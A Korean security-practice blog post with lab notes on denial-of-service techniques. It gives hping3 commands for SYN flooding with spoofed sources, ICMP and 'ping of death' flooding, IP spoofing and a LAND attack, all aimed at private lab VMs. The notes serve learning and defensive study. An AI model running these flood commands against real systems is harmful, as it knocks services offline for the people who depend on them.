네트워크 해킹 dos기법

2020. 11. 30. 17:37·공격기법 및 탐지

dos 공격 혼자서 한특정곳에 공격함

네트워크 해킹

 

칼리 열기

 

network

 

vm08번으로

 

edit

virtual Network Editer

진입하려서 kali 리눅스, 서버 컴퓨터 (공격 타겟)

같은 네트워크 구성

두 개 다 브릿지 설정 or Vmnet8(NAT)고정

겹칠까봐 VMnet8번으로

 

Centos8, kali 동일 네트워크 브릿지 또는 vmnet8

 

 

 

hping3 —rand-source

 

 

Cenos8 에서

 

 

레드햇 계열 우분투 계열

systemctl start httpd // service apache2 start

Systemctl status httpd // service apche2 status

 

dnf install 파일 이름// apt-get install [파일이름

 

 

---------------------------------------------------------------------------------------------------------

 

 

 

 

칼리리눅스에서

centos 에서도 wireshark 키기

hping3 --rand-source 192.168.80.131 -p 80 -S

치기

타겟ip

 

그뒤에 wire shark 로 확인

 

hping3 --rand-source --flood 192.168.80.131 -p -S

 

랜덤으로 임의의 주소로 192.168.80.131 로 syn 패킷을보냄

 

 

씽크 플러딩은

TCP/IP 통신 프로토콜의 문제점을 악용한 서비스거부(Denial of Service) 공격의 하나로 공격자는 목적 호스트에 자신의 소스주 소를 존재하지않는 임의의 주소로 속인 후 연속적인 SYN 패킷을 보낸다. 그러면 목적 호스트는 SYN 패킷을 받은 후 응답(SYN,ACK )을 하게 되고 이 응답(SYN,ACK)의 응답(ACK)을 기다리게 된다. 하지만 소스주소가 속여서 보내졌으므로 응답은 오지않고 목적 호스트는 일정시간(timeout)동안 기다리다가 접속과정을 마치게 된다.

 

 

 

 

 

 

 

 

 

 

--------------------------------------------------------------------------------------------------

centos에서

 

systemctl start httpd

Systemctl status httpd

 

이거한뒤에

칼리에서

 

hping3 --rand-source --flood 192.168.80.131 -p 80 -S

 

씽크 플러딩 공격

hping3 --rand-source --flood [타겟주소] -p 80 -S

 

 

 

 

ping of death공격

hping3 --icmp --rand-source --flood 192.168.80.131 -d 50000

타겟주소 패킷크기

icmp flooding

 

 

 

 

hping3 -a 192.168.80.131 192.168.80.132 --icmp --flood

-a[아이피] IP spoofing(IP변조)

 

 

 

 

Land ATTACK

타겟(centos) 192.168.80.131

공격자(kalilinux) 192.168.80.132

타겟 ip가 공격자ip 로 변환하여 공격하는방법

 

hping3 -a 192.168.80.131 192.168.80.131 --icmp --flood

-a[아이피]

hping3 -a [변조시킬IP] [공격대상IP] --icmp --flood

 

 

 

 

 

 

setuid 프로세스가 실행중에만 소유자(root)의 권한으로 프로세스를 실행

 

 

 

exe 단독으로실행

dll 공통으로 쓰는 모듈들을 저장힘.

'공격기법 및 탐지' 카테고리의 다른 글

tcp half open scan  (0) 2021.01.04
tcp syn(full. open. connect) scan  (0) 2021.01.04
네트워크 - 중요이론  (0) 2021.01.04
네트워크 arp 스푸핑  (0) 2020.11.30
네트워크 dns 스푸핑  (0) 2020.11.30
'공격기법 및 탐지' 카테고리의 다른 글
  • tcp syn(full. open. connect) scan
  • 네트워크 - 중요이론
  • 네트워크 arp 스푸핑
  • 네트워크 dns 스푸핑
taktaks
taktaks
보안 연습 일기장입니다. 모든 연습은 불법적인 용도로 사용하지 말아주시길 부탁드립니다. 용무는 wndudxkr2005@gmail.com 메일 부탁드립니다.
  • taktaks
    taktaks
    taktaks
  • 전체
    오늘
    어제
    • 보안 일지 (280)
      • 네트워크 구축 (12)
      • 리눅스 보안구축 (10)
      • 파이썬 기본 (11)
      • Web hacking (39)
      • 통합 인프라 보안 (41)
      • 공격기법 및 탐지 (33)
      • 악성코드 및 포렌식 (93)
      • 리버싱 (5)
      • 시스템 해킹 (20)
      • C 언어 (12)
  • 블로그 메뉴

    • 링크

    • 공지사항

    • 인기 글

    • 태그

      프롯
    • 최근 댓글

    • 최근 글

    • hELLO· Designed By정상우.v4.10.3
    taktaks
    네트워크 해킹 dos기법

    개인정보

    • 티스토리 홈
    • 포럼
    • 로그인
    상단으로

    티스토리툴바

    단축키

    내 블로그

    내 블로그 - 관리자 홈 전환
    Q
    Q
    새 글 쓰기
    W
    W

    블로그 게시글

    글 수정 (권한 있는 경우)
    E
    E
    댓글 영역으로 이동
    C
    C

    모든 영역

    이 페이지의 URL 복사
    S
    S
    맨 위로 이동
    T
    T
    티스토리 홈 이동
    H
    H
    단축키 안내
    Shift + /
    ⇧ + /

    * 단축키는 한글/영문 대소문자로 이용 가능하며, 티스토리 기본 도메인에서만 동작합니다.